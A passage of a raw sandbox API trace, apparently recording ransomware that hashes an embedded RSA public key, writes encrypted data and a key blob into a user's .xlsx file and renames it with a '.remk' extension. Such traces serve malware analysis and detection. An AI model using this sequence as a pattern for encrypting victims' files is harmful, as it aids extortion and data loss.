[0232.120] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.121] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.121] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.122] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.122] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.122] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.122] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.122] GetLastError () returned 0x0 [0232.122] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.122] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.122] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.122] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.122] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.123] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0232.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee160 | out: hHeap=0x630000) returned 1 [0232.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee178 | out: hHeap=0x630000) returned 1 [0232.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1c0 | out: hHeap=0x630000) returned 1 [0232.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.123] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1c0 [0232.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0232.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee178 [0232.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0232.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee160 [0232.123] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee178 | out: hHeap=0x630000) returned 1 [0232.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee160 | out: hHeap=0x630000) returned 1 [0232.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1c0 | out: hHeap=0x630000) returned 1 [0232.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0232.124] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0232.124] GetCurrentThreadId () returned 0x314 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b8db0 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.124] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.125] GetCurrentThreadId () returned 0x314 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0232.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5498 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1c0 [0232.125] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0232.125] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee160 [0232.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0232.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee178 [0232.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0232.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee148 [0232.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1d8 [0232.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0232.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1a8 [0232.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee190 [0232.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee1f0 [0232.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee190 | out: hHeap=0x630000) returned 1 [0232.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee190 [0232.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1a8 | out: hHeap=0x630000) returned 1 [0232.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0232.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0232.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0232.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee160 | out: hHeap=0x630000) returned 1 [0232.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee160 [0232.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0232.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1c0 | out: hHeap=0x630000) returned 1 [0232.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0232.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1f0 | out: hHeap=0x630000) returned 1 [0232.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0232.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0232.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0232.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0232.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee160 | out: hHeap=0x630000) returned 1 [0232.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0232.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0232.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0232.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee190 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1d8 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee178 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee148 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee130 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c1e60 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5498 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0232.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0232.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0232.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.130] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0x14c89, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0x14c89, lpOverlapped=0x0) returned 1 [0232.130] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0232.130] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x14c8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.130] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0232.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0232.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0232.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.131] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0232.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.131] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.131] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.131] CloseHandle (hObject=0x640) returned 1 [0232.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e730 [0232.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0232.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e730 | out: hHeap=0x630000) returned 1 [0232.133] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_33tr7aCFWUbIhs9iqCR.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_33tr7acfwubihs9iqcr.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\_33tr7aCFWUbIhs9iqCR.xlsx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\_33tr7acfwubihs9iqcr.xlsx.remk")) returned 1 [0232.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.137] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0232.139] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7084af40, ftCreationTime.dwHighDateTime=0x1d5ab43, ftLastAccessTime.dwLowDateTime=0xcd120a10, ftLastAccessTime.dwHighDateTime=0x1d5b56a, ftLastWriteTime.dwLowDateTime=0xcd120a10, ftLastWriteTime.dwHighDateTime=0x1d5b56a, nFileSizeHigh=0x0, nFileSizeLow=0x14c8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_33tr7aCFWUbIhs9iqCR.xlsx", cAlternateFileName="_33TR7~1.XLS")) returned 0 [0232.139] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0232.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0232.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.139] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0232.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.139] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0232.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0232.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e490 | out: hHeap=0x630000) returned 1 [0232.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e490 [0232.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0232.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0232.140] HeapFree (in: hHeap=0x630000, 